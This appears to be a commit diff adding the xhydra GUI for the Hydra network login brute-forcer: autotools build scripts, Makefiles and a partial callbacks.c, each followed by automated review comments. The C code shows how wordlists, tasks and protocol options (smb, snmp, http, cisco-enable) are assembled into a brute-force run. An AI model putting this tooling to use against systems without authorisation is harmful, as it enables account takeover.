$doit $mvcmd $dsttmp $dstdir/$dstfile
fi &&
exit 0
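
Review bot: the defaults block initialises `transform_arg=""`, but the `-t=*` case and the later `if [ x"$transformarg" = x ]` test use `transformarg`, which is never cleared. A `transformarg` inherited from the caller's environment is therefore passed to `sed` when the installed file name is computed. Initialise `transformarg=""` instead. Separately, `dsttmp=$dstdir/#inst.$$#` is a predictable name built from the PID, and `$src`, `$dst` and `$dsttmp` are expanded unquoted. The README has users run `make install` after `su root`, so quote these expansions and confirm the destination directory is not writable by other users.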

20
hydra-gtk/make_xhydra.sh Executable file

@ -0,0 +1,20 @@
#!/bin/bash
PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/opt/gnome/lib/pkgconfig
export PKG_CONFIG_PATH
echo "Trying to compile xhydra now (hydra gtk gui) - dont worry if this fails, this is really optional ..."
./configure > /dev/null 2> errors
test -e Makefile || {
echo "Error: configure wasnt happy. Analyse this:"
cat errors
exit 1
}
make > /dev/null 2> errors
test -e src/xhydra || {
echo "Error: could not compile. Analyse this:"
cat errors
echo
echo 'Do not worry, as I said, xhydra is really optional. ./hydra is ready to go!'
exit 0
}
cp -v src/xhydra ..
echo "The GTK GUI is ready, type \"./xhydra\" to start"
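
Review bot: the two failure branches disagree on exit status. A failed `./configure` does `exit 1` and a failed `make` does `exit 0`, so a caller cannot tell from the status whether `xhydra` was built. If the GUI is optional, return a distinct non-zero code in both cases and let the caller decide to ignore it. Both steps also redirect stderr to a fixed file named `errors` in the source directory, which is never removed on success. Nothing in the script needs bash, so `#!/bin/sh` would do.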

198
hydra-gtk/missing Executable file

@ -0,0 +1,198 @@
#! /bin/sh
# Common stub for a few missing GNU programs while installing.
# Copyright (C) 1996, 1997, 2001, 2002 Free Software Foundation, Inc.
# Franc,ois Pinard <pinard@iro.umontreal.ca>, 1996.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# 02111-1307, USA.
if test $# -eq 0; then
echo 1>&2 "Try \`$0 --help' for more information"
exit 1
fi
# In the cases where this matters, `missing' is being run in the
# srcdir already.
if test -f configure.in; then
configure_ac=configure.ac
else
configure_ac=configure.in
fi
case "$1" in
-h|--h|--he|--hel|--help)
echo "\
$0 [OPTION]... PROGRAM [ARGUMENT]...
Handle \`PROGRAM [ARGUMENT]...' for when PROGRAM is missing, or return an
error status if there is no known handling for PROGRAM.
Options:
-h, --help display this help and exit
-v, --version output version information and exit
Supported PROGRAM values:
aclocal touch file \`aclocal.m4'
autoconf touch file \`configure'
autoheader touch file \`config.h.in'
automake touch all \`Makefile.in' files
bison create \`y.tab.[ch]', if possible, from existing .[ch]
flex create \`lex.yy.c', if possible, from existing .c
lex create \`lex.yy.c', if possible, from existing .c
makeinfo touch the output file
yacc create \`y.tab.[ch]', if possible, from existing .[ch]"
;;
-v|--v|--ve|--ver|--vers|--versi|--versio|--version)
echo "missing - GNU libit 0.0"
;;
-*)
echo 1>&2 "$0: Unknown \`$1' option"
echo 1>&2 "Try \`$0 --help' for more information"
exit 1
;;
aclocal*)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified \`acinclude.m4' or \`$configure_ac'. You might want
to install the \`Automake' and \`Perl' packages. Grab them from
any GNU archive site."
touch aclocal.m4
;;
autoconf)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified \`$configure_ac'. You might want to install the
\`Autoconf' and \`GNU m4' packages. Grab them from any GNU
archive site."
touch configure
;;
autoheader)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified \`acconfig.h' or \`$configure_ac'. You might want
to install the \`Autoconf' and \`GNU m4' packages. Grab them
from any GNU archive site."
files=`sed -n 's/^[ ]*A[CM]_CONFIG_HEADER(\([^)]*\)).*/\1/p' $configure_ac`
test -z "$files" && files="config.h"
touch_files=
for f in $files; do
case "$f" in
*:*) touch_files="$touch_files "`echo "$f" |
sed -e 's/^[^:]*://' -e 's/:.*//'`;;
*) touch_files="$touch_files $f.in";;
esac
done
touch $touch_files
;;
automake*)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified \`Makefile.am', \`acinclude.m4' or \`$configure_ac'.
You might want to install the \`Automake' and \`Perl' packages.
Grab them from any GNU archive site."
find . -type f -name Makefile.am -print |
sed 's/\.am$/.in/' |
while read f; do touch "$f"; done
;;
bison|yacc)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified a \`.y' file. You may need the \`Bison' package
in order for those modifications to take effect. You can get
\`Bison' from any GNU archive site."
rm -f y.tab.c y.tab.h
if [ $# -ne 1 ]; then
eval LASTARG="\${$#}"
case "$LASTARG" in
*.y)
SRCFILE=`echo "$LASTARG" | sed 's/y$/c/'`
if [ -f "$SRCFILE" ]; then
cp "$SRCFILE" y.tab.c
fi
SRCFILE=`echo "$LASTARG" | sed 's/y$/h/'`
if [ -f "$SRCFILE" ]; then
cp "$SRCFILE" y.tab.h
fi
;;
esac
fi
if [ ! -f y.tab.h ]; then
echo >y.tab.h
fi
if [ ! -f y.tab.c ]; then
echo 'main() { return 0; }' >y.tab.c
fi
;;
lex|flex)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified a \`.l' file. You may need the \`Flex' package
in order for those modifications to take effect. You can get
\`Flex' from any GNU archive site."
rm -f lex.yy.c
if [ $# -ne 1 ]; then
eval LASTARG="\${$#}"
case "$LASTARG" in
*.l)
SRCFILE=`echo "$LASTARG" | sed 's/l$/c/'`
if [ -f "$SRCFILE" ]; then
cp "$SRCFILE" lex.yy.c
fi
;;
esac
fi
if [ ! -f lex.yy.c ]; then
echo 'main() { return 0; }' >lex.yy.c
fi
;;
makeinfo)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified a \`.texi' or \`.texinfo' file, or any other file
indirectly affecting the aspect of the manual. The spurious
call might also be the consequence of using a buggy \`make' (AIX,
DU, IRIX). You might want to install the \`Texinfo' package or
the \`GNU make' package. Grab either from any GNU archive site."
file=`echo "$*" | sed -n 's/.*-o \([^ ]*\).*/\1/p'`
if test -z "$file"; then
file=`echo "$*" | sed 's/.* \([^ ]*\) *$/\1/'`
file=`sed -n '/^@setfilename/ { s/.* \([^ ]*\) *$/\1/; p; q; }' $file`
fi
touch $file
;;
*)
echo 1>&2 "\
WARNING: \`$1' is needed, and you do not seem to have it handy on your
system. You might have modified some files without having the
proper tools for further handling them. Check the \`README' file,
it often tells you about the needed prerequirements for installing
this package. You may also peek at any GNU archive site, in case
some other package would contain this missing \`$1' program."
exit 1
;;
esac
exit 0
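
Review bot: In the `makeinfo)` branch, `$file` is expanded unquoted in `sed -n '/^@setfilename/ ...' $file` and again in `touch $file`, so a texinfo path containing whitespace or glob characters is split or expanded before it is used; quote both expansions as `"$file"`. Separately, the `bison|yacc)` and `lex|flex)` branches write a stub `main() { return 0; }` into `y.tab.c` or `lex.yy.c` and the script then reaches `exit 0`, so a build on a machine without those tools carries on with placeholder sources and only a warning on stderr; that behaviour deserves a line in the build notes.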

40
hydra-gtk/mkinstalldirs Executable file

@ -0,0 +1,40 @@
#! /bin/sh
# mkinstalldirs --- make directory hierarchy
# Author: Noah Friedman <friedman@prep.ai.mit.edu>
# Created: 1993-05-16
# Public domain
# $Id: mkinstalldirs,v 1.13 1999/01/05 03:18:55 bje Exp $
errstatus=0
for file
do
set fnord `echo ":$file" | sed -ne 's/^:\//#/;s/^://;s/\// /g;s/^#/\//;p'`
shift
pathcomp=
for d
do
pathcomp="$pathcomp$d"
case "$pathcomp" in
-* ) pathcomp=./$pathcomp ;;
esac
if test ! -d "$pathcomp"; then
echo "mkdir $pathcomp"
mkdir "$pathcomp" || lasterr=$?
if test ! -d "$pathcomp"; then
errstatus=$lasterr
fi
fi
pathcomp="$pathcomp/"
done
done
exit $errstatus
# mkinstalldirs ends here
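
Review bot: The component split in `set fnord ...` works by turning every `/` into a space and relying on word splitting of the unquoted backtick substitution, so a directory name that itself contains whitespace is broken into separate components and the wrong directories are created under `$(DESTDIR)`. The same unquoted substitution is also subject to glob expansion. Where the install targets only need the hierarchy to exist, `mkdir -p -- "$file"` does the same job without the splitting; if this script has to stay for old platforms, note the limitation in a comment at the top.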

17
hydra-gtk/src/Makefile.am Executable file

@ -0,0 +1,17 @@
## Process this file with automake to produce Makefile.in
INCLUDES = \
-DPACKAGE_DATA_DIR=\""$(datadir)"\" \
-DPACKAGE_LOCALE_DIR=\""$(prefix)/$(DATADIRNAME)/locale"\" \
@PACKAGE_CFLAGS@
bin_PROGRAMS = xhydra
xhydra_SOURCES = \
main.c \
support.c support.h \
interface.c interface.h \
callbacks.c callbacks.h
xhydra_LDADD = @PACKAGE_LIBS@
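
Review bot: `INCLUDES` is the deprecated automake name for preprocessor flags; move the two `-D` definitions and `@PACKAGE_CFLAGS@` to `AM_CPPFLAGS` (or `xhydra_CPPFLAGS`) so the file keeps working with newer automake releases. The file header also records this file as executable, as it does for the `.c` and `.h` files added in this commit; build inputs and sources should be committed with mode 644.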

319
hydra-gtk/src/Makefile.in Executable file

@ -0,0 +1,319 @@
# Makefile.in generated automatically by automake 1.4-p6 from Makefile.am
# Copyright (C) 1994, 1995-8, 1999, 2001 Free Software Foundation, Inc.
# This Makefile.in is free software; the Free Software Foundation
# gives unlimited permission to copy and/or distribute it,
# with or without modifications, as long as this notice is preserved.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY, to the extent permitted by law; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE.
SHELL = @SHELL@
srcdir = @srcdir@
top_srcdir = @top_srcdir@
VPATH = @srcdir@
prefix = @prefix@
exec_prefix = @exec_prefix@
bindir = @bindir@
sbindir = @sbindir@
libexecdir = @libexecdir@
datadir = @datadir@
sysconfdir = @sysconfdir@
sharedstatedir = @sharedstatedir@
localstatedir = @localstatedir@
libdir = @libdir@
infodir = @infodir@
mandir = @mandir@
includedir = @includedir@
oldincludedir = /usr/include
DESTDIR =
pkgdatadir = $(datadir)/@PACKAGE@
pkglibdir = $(libdir)/@PACKAGE@
pkgincludedir = $(includedir)/@PACKAGE@
top_builddir = ..
ACLOCAL = @ACLOCAL@
AUTOCONF = @AUTOCONF@
AUTOMAKE = @AUTOMAKE@
AUTOHEADER = @AUTOHEADER@
INSTALL = @INSTALL@
INSTALL_PROGRAM = @INSTALL_PROGRAM@ $(AM_INSTALL_PROGRAM_FLAGS)
INSTALL_DATA = @INSTALL_DATA@
INSTALL_SCRIPT = @INSTALL_SCRIPT@
transform = @program_transform_name@
NORMAL_INSTALL = :
PRE_INSTALL = :
POST_INSTALL = :
NORMAL_UNINSTALL = :
PRE_UNINSTALL = :
POST_UNINSTALL = :
CC = @CC@
MAINT = @MAINT@
MAKEINFO = @MAKEINFO@
PACKAGE = @PACKAGE@
PACKAGE_CFLAGS = @PACKAGE_CFLAGS@
PACKAGE_LIBS = @PACKAGE_LIBS@
PKG_CONFIG = @PKG_CONFIG@
VERSION = @VERSION@
INCLUDES = -DPACKAGE_DATA_DIR=\""$(datadir)"\" -DPACKAGE_LOCALE_DIR=\""$(prefix)/$(DATADIRNAME)/locale"\" @PACKAGE_CFLAGS@
bin_PROGRAMS = xhydra
xhydra_SOURCES = main.c support.c support.h interface.c interface.h callbacks.c callbacks.h
xhydra_LDADD = @PACKAGE_LIBS@
mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs
CONFIG_HEADER = ../config.h
CONFIG_CLEAN_FILES =
PROGRAMS = $(bin_PROGRAMS)
DEFS = @DEFS@ -I. -I$(srcdir) -I..
CPPFLAGS = @CPPFLAGS@
LDFLAGS = @LDFLAGS@
LIBS = @LIBS@
xhydra_OBJECTS = main.o support.o interface.o callbacks.o
xhydra_DEPENDENCIES =
xhydra_LDFLAGS =
CFLAGS = @CFLAGS@
COMPILE = $(CC) $(DEFS) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS)
CCLD = $(CC)
LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(LDFLAGS) -o $@
DIST_COMMON = Makefile.am Makefile.in
DISTFILES = $(DIST_COMMON) $(SOURCES) $(HEADERS) $(TEXINFOS) $(EXTRA_DIST)
TAR = tar
GZIP_ENV = --best
DEP_FILES = .deps/callbacks.P .deps/interface.P .deps/main.P \
.deps/support.P
SOURCES = $(xhydra_SOURCES)
OBJECTS = $(xhydra_OBJECTS)
all: all-redirect
.SUFFIXES:
.SUFFIXES: .S .c .o .s
$(srcdir)/Makefile.in: @MAINTAINER_MODE_TRUE@ Makefile.am $(top_srcdir)/configure.in $(ACLOCAL_M4)
cd $(top_srcdir) && $(AUTOMAKE) --gnu src/Makefile
Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status $(BUILT_SOURCES)
cd $(top_builddir) \
&& CONFIG_FILES=$(subdir)/$@ CONFIG_HEADERS= $(SHELL) ./config.status
mostlyclean-binPROGRAMS:
clean-binPROGRAMS:
-test -z "$(bin_PROGRAMS)" || rm -f $(bin_PROGRAMS)
distclean-binPROGRAMS:
maintainer-clean-binPROGRAMS:
install-binPROGRAMS: $(bin_PROGRAMS)
@$(NORMAL_INSTALL)
$(mkinstalldirs) $(DESTDIR)$(bindir)
@list='$(bin_PROGRAMS)'; for p in $$list; do \
if test -f $$p; then \
echo " $(INSTALL_PROGRAM) $$p $(DESTDIR)$(bindir)/`echo $$p|sed 's/$(EXEEXT)$$//'|sed '$(transform)'|sed 's/$$/$(EXEEXT)/'`"; \
$(INSTALL_PROGRAM) $$p $(DESTDIR)$(bindir)/`echo $$p|sed 's/$(EXEEXT)$$//'|sed '$(transform)'|sed 's/$$/$(EXEEXT)/'`; \
else :; fi; \
done
uninstall-binPROGRAMS:
@$(NORMAL_UNINSTALL)
list='$(bin_PROGRAMS)'; for p in $$list; do \
rm -f $(DESTDIR)$(bindir)/`echo $$p|sed 's/$(EXEEXT)$$//'|sed '$(transform)'|sed 's/$$/$(EXEEXT)/'`; \
done
.s.o:
$(COMPILE) -c $<
.S.o:
$(COMPILE) -c $<
mostlyclean-compile:
-rm -f *.o core *.core
clean-compile:
distclean-compile:
-rm -f *.tab.c
maintainer-clean-compile:
xhydra: $(xhydra_OBJECTS) $(xhydra_DEPENDENCIES)
@rm -f xhydra
$(LINK) $(xhydra_LDFLAGS) $(xhydra_OBJECTS) $(xhydra_LDADD) $(LIBS)
tags: TAGS
ID: $(HEADERS) $(SOURCES) $(LISP)
list='$(SOURCES) $(HEADERS)'; \
unique=`for i in $$list; do echo $$i; done | \
awk ' { files[$$0] = 1; } \
END { for (i in files) print i; }'`; \
here=`pwd` && cd $(srcdir) \
&& mkid -f$$here/ID $$unique $(LISP)
TAGS: $(HEADERS) $(SOURCES) $(TAGS_DEPENDENCIES) $(LISP)
tags=; \
here=`pwd`; \
list='$(SOURCES) $(HEADERS)'; \
unique=`for i in $$list; do echo $$i; done | \
awk ' { files[$$0] = 1; } \
END { for (i in files) print i; }'`; \
test -z "$(ETAGS_ARGS)$$unique$(LISP)$$tags" \
|| (cd $(srcdir) && etags $(ETAGS_ARGS) $$tags $$unique $(LISP) -o $$here/TAGS)
mostlyclean-tags:
clean-tags:
distclean-tags:
-rm -f TAGS ID
maintainer-clean-tags:
distdir = $(top_builddir)/$(PACKAGE)-$(VERSION)/$(subdir)
subdir = src
distdir: $(DISTFILES)
here=`cd $(top_builddir) && pwd`; \
top_distdir=`cd $(top_distdir) && pwd`; \
distdir=`cd $(distdir) && pwd`; \
cd $(top_srcdir) \
&& $(AUTOMAKE) --include-deps --build-dir=$$here --srcdir-name=$(top_srcdir) --output-dir=$$top_distdir --gnu src/Makefile
@for file in $(DISTFILES); do \
d=$(srcdir); \
if test -d $$d/$$file; then \
cp -pr $$d/$$file $(distdir)/$$file; \
else \
test -f $(distdir)/$$file \
|| ln $$d/$$file $(distdir)/$$file 2> /dev/null \
|| cp -p $$d/$$file $(distdir)/$$file || :; \
fi; \
done
DEPS_MAGIC := $(shell mkdir .deps > /dev/null 2>&1 || :)
-include $(DEP_FILES)
mostlyclean-depend:
clean-depend:
distclean-depend:
-rm -rf .deps
maintainer-clean-depend:
%.o: %.c
@echo '$(COMPILE) -c $<'; \
$(COMPILE) -Wp,-MD,.deps/$(*F).pp -c $<
@-cp .deps/$(*F).pp .deps/$(*F).P; \
tr ' ' '\012' < .deps/$(*F).pp \
| sed -e 's/^\\$$//' -e '/^$$/ d' -e '/:$$/ d' -e 's/$$/ :/' \
>> .deps/$(*F).P; \
rm .deps/$(*F).pp
%.lo: %.c
@echo '$(LTCOMPILE) -c $<'; \
$(LTCOMPILE) -Wp,-MD,.deps/$(*F).pp -c $<
@-sed -e 's/^\([^:]*\)\.o[ ]*:/\1.lo \1.o :/' \
< .deps/$(*F).pp > .deps/$(*F).P; \
tr ' ' '\012' < .deps/$(*F).pp \
| sed -e 's/^\\$$//' -e '/^$$/ d' -e '/:$$/ d' -e 's/$$/ :/' \
>> .deps/$(*F).P; \
rm -f .deps/$(*F).pp
info-am:
info: info-am
dvi-am:
dvi: dvi-am
check-am: all-am
check: check-am
installcheck-am:
installcheck: installcheck-am
install-exec-am: install-binPROGRAMS
install-exec: install-exec-am
install-data-am:
install-data: install-data-am
install-am: all-am
@$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am
install: install-am
uninstall-am: uninstall-binPROGRAMS
uninstall: uninstall-am
all-am: Makefile $(PROGRAMS)
all-redirect: all-am
install-strip:
$(MAKE) $(AM_MAKEFLAGS) AM_INSTALL_PROGRAM_FLAGS=-s install
installdirs:
$(mkinstalldirs) $(DESTDIR)$(bindir)
mostlyclean-generic:
clean-generic:
distclean-generic:
-rm -f Makefile $(CONFIG_CLEAN_FILES)
-rm -f config.cache config.log stamp-h stamp-h[0-9]*
maintainer-clean-generic:
mostlyclean-am: mostlyclean-binPROGRAMS mostlyclean-compile \
mostlyclean-tags mostlyclean-depend mostlyclean-generic
mostlyclean: mostlyclean-am
clean-am: clean-binPROGRAMS clean-compile clean-tags clean-depend \
clean-generic mostlyclean-am
clean: clean-am
distclean-am: distclean-binPROGRAMS distclean-compile distclean-tags \
distclean-depend distclean-generic clean-am
distclean: distclean-am
maintainer-clean-am: maintainer-clean-binPROGRAMS \
maintainer-clean-compile maintainer-clean-tags \
maintainer-clean-depend maintainer-clean-generic \
distclean-am
@echo "This command is intended for maintainers to use;"
@echo "it deletes files that may require special tools to rebuild."
maintainer-clean: maintainer-clean-am
.PHONY: mostlyclean-binPROGRAMS distclean-binPROGRAMS clean-binPROGRAMS \
maintainer-clean-binPROGRAMS uninstall-binPROGRAMS install-binPROGRAMS \
mostlyclean-compile distclean-compile clean-compile \
maintainer-clean-compile tags mostlyclean-tags distclean-tags \
clean-tags maintainer-clean-tags distdir mostlyclean-depend \
distclean-depend clean-depend maintainer-clean-depend info-am info \
dvi-am dvi check check-am installcheck-am installcheck install-exec-am \
install-exec install-data-am install-data install-am install \
uninstall-am uninstall all-redirect all-am all installdirs \
mostlyclean-generic distclean-generic clean-generic \
maintainer-clean-generic clean mostlyclean distclean maintainer-clean
# Tell versions [3.59,3.63) of GNU make to not export all variables.
# Otherwise a system limit (for SysV at least) may be exceeded.
.NOEXPORT:
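
Review bot: Generated output is being committed next to its source: the first line says `generated automatically by automake 1.4-p6 from Makefile.am`, so this file can drift from `Makefile.am` and nothing in the commit says which automake version has to be used to regenerate it. Either leave it out of version control and generate it when a release is cut, or document the required tool version. Within the file, `INCLUDES` references `$(DATADIRNAME)` but no `DATADIRNAME = ...` assignment appears among the substituted variables, so unless it is supplied from outside, `PACKAGE_LOCALE_DIR` expands to `$(prefix)//locale`.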

682
hydra-gtk/src/callbacks.c Executable file

@ -0,0 +1,682 @@
/*
* This file handles all that needs to be done...
* Some stuff is stolen from gcombust since I never used pipes... ok, i
* only used them in reallife :)
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <gtk/gtk.h>
#include "callbacks.h"
#include "interface.h"
#include "support.h"
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
int hydra_pid = 0;
char port[10];
char tasks[10];
char timeout[10];
char smbparm[12];
char snmpparm[4];
char sapr3id[4];
char passLoginNull[4];
#define BUF_S 1024
void hydra_select_file(GtkEntry * widget, char *text) {
#ifdef GTK_TYPE_FILE_CHOOSER
GtkWidget *dialog;
char *filename;
dialog = gtk_file_chooser_dialog_new(text, (GtkWindow *) wndMain, GTK_FILE_CHOOSER_ACTION_OPEN,
GTK_STOCK_OPEN, GTK_RESPONSE_ACCEPT, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, NULL);
if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_ACCEPT) {
filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog));
gtk_entry_set_text(widget, filename);
g_free(filename);
}
gtk_widget_destroy(dialog);
#endif
}
int hydra_get_options(char *options[]) {
/* get the stuff from the gtk entries... */
int i = 1;
GtkWidget *widget;
GtkWidget *widget2;
int j;
gchar *tmp;
GString *a;
options[0] = HYDRA_BIN;
/* get the port */
widget = lookup_widget(GTK_WIDGET(wndMain), "spnPort");
j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget);
if (j != 0) {
snprintf(port, 10, "%d", j);
options[i++] = "-s";
options[i++] = port;
}
/* prefer ipv6 */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkIPV6");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-6";
}
/* use SSL? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkSSL");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-S";
}
/* be verbose? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkVerbose");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-v";
}
/* show attempts */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkAttempts");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-V";
}
/* debug mode? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkDebug");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-d";
}
/* use colon separated list? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkColon");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-C";
widget = lookup_widget(GTK_WIDGET(wndMain), "entColonFile");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else {
/* get the username, or username list */
widget = lookup_widget(GTK_WIDGET(wndMain), "radioUsername1");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-l";
widget = lookup_widget(GTK_WIDGET(wndMain), "entUsername");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else {
options[i++] = "-L";
widget = lookup_widget(GTK_WIDGET(wndMain), "entUsernameFile");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
}
/* get the pass, or pass list */
widget = lookup_widget(GTK_WIDGET(wndMain), "radioPass1");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-p";
widget = lookup_widget(GTK_WIDGET(wndMain), "entPass");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else {
options[i++] = "-P";
widget = lookup_widget(GTK_WIDGET(wndMain), "entPassFile");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
}
}
/* empty passes / login as pass? */
memset(passLoginNull, 0, 4);
widget = lookup_widget(GTK_WIDGET(wndMain), "chkPassNull");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
passLoginNull[0] = 'n';
}
widget = lookup_widget(GTK_WIDGET(wndMain), "chkPassLogin");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
if (passLoginNull[0] == 0) {
passLoginNull[0] = 's';
} else {
passLoginNull[1] = 's';
}
}
if (passLoginNull[0] != 0) {
options[i++] = "-e";
options[i++] = passLoginNull;
}
/* #of tasks */
widget = lookup_widget(GTK_WIDGET(wndMain), "spnTasks");
j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget);
if (j != 40) {
snprintf(tasks, 10, "%d", j);
options[i++] = "-t";
options[i++] = tasks;
}
/* timeout */
widget = lookup_widget(GTK_WIDGET(wndMain), "spnTimeout");
j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget);
if (j != 30) {
snprintf(timeout, 10, "%d", j);
options[i++] = "-w";
options[i++] = timeout;
}
/* loop around users? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkUsernameLoop");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-u";
}
/* exit after first found pair? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkExitf");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-f";
}
/* get additional parameters */
widget = lookup_widget(GTK_WIDGET(wndMain), "entProtocol");
tmp = (char *) gtk_entry_get_text((GtkEntry *) widget);
if (!strncmp(tmp, "http-proxy", 10)) {
widget = lookup_widget(GTK_WIDGET(wndMain), "entHTTPProxyURL");
options[i++] = "-m";
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strncmp(tmp, "http-", 5) || !strncmp(tmp, "https-", 6)) {
options[i++] = "-m";
widget = lookup_widget(GTK_WIDGET(wndMain), "entHTTPURL");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strcmp(tmp, "cisco-enable")) {
options[i++] = "-m";
widget = lookup_widget(GTK_WIDGET(wndMain), "entCiscoPass");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strcmp(tmp, "ldap3-crammd5")) {
options[i++] = "-m";
widget = lookup_widget(GTK_WIDGET(wndMain), "entLDAPDN");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strcmp(tmp, "ldap3-digestmd5")) {
options[i++] = "-m";
widget = lookup_widget(GTK_WIDGET(wndMain), "entLDAPDN");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strcmp(tmp, "smb")) {
memset(smbparm, 0, 12);
widget = lookup_widget(GTK_WIDGET(wndMain), "chkDomain");
widget2 = lookup_widget(GTK_WIDGET(wndMain), "chkLocal");
options[i++] = "-m";
strncpy(smbparm, "Both", sizeof(smbparm));
smbparm[strlen("Both")] = '\0';
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
strncpy(smbparm, "Domain", sizeof(smbparm));
smbparm[strlen("Domain")] = '\0';
}
if (gtk_toggle_button_get_active((GtkToggleButton *) widget2)) {
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
strncpy(smbparm, "Both", sizeof(smbparm));
smbparm[strlen("Both")] = '\0';
} else {
strncpy(smbparm, "Local", sizeof(smbparm));
smbparm[strlen("Local")] = '\0';
}
}
widget = lookup_widget(GTK_WIDGET(wndMain), "chkNTLM");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
strcat(smbparm, "Hash");
}
options[i++] = smbparm;
} else if (!strcmp(tmp, "sapr3")) {
widget = lookup_widget(GTK_WIDGET(wndMain), "spnSAPR3");
j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget);
snprintf(sapr3id, sizeof(sapr3id), "%d", j);
options[i++] = "-m";
options[i++] = sapr3id;
} else if (!strcmp(tmp, "cvs") || !strcmp(tmp, "svn")) {
widget = lookup_widget(GTK_WIDGET(wndMain), "entCVS");
options[i++] = "-m";
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strcmp(tmp, "snmp")) {
memset(snmpparm, 0, 4);
widget = lookup_widget(GTK_WIDGET(wndMain), "radioSNMPVer1");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
snmpparm[0] = '1';
} else {
snmpparm[0] = '2';
}
widget = lookup_widget(GTK_WIDGET(wndMain), "radioSNMPWrite");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
snmpparm[0] = 'w';
} else {
snmpparm[0] = 'r';
}
options[i++] = "-m";
options[i++] = snmpparm;
} else if (!strcmp(tmp, "telnet")) {
widget = lookup_widget(GTK_WIDGET(wndMain), "entTelnet");
if ((char *) gtk_entry_get_text((GtkEntry *) widget) != NULL) {
options[i++] = "-m";
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
}
}
/* clean up proxy settings */
unsetenv("HYDRA_PROXY_HTTP");
unsetenv("HYDRA_PROXY_CONNECT");
unsetenv("HYDRA_PROXY_AUTH");
/* proxy support */
widget = lookup_widget(GTK_WIDGET(wndMain), "radioProxy");
if (!gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
widget2 = lookup_widget(GTK_WIDGET(wndMain), "entHTTPProxy");
widget = lookup_widget(GTK_WIDGET(wndMain), "radioProxy2");
/* which variable do we set? */
if ((!strncmp(tmp, "http-", 5)) && (gtk_toggle_button_get_active((GtkToggleButton *) widget))) {
setenv("HYDRA_PROXY_HTTP", gtk_entry_get_text((GtkEntry *) widget2), 1);
} else {
